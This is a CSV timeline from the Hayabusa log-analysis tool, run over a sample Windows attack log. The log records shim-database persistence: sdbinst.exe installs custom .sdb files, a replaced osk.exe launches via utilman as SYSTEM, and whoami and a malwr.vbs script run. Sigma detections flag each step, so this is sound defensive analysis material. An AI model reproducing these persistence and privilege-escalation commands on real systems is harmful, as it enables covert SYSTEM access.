2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
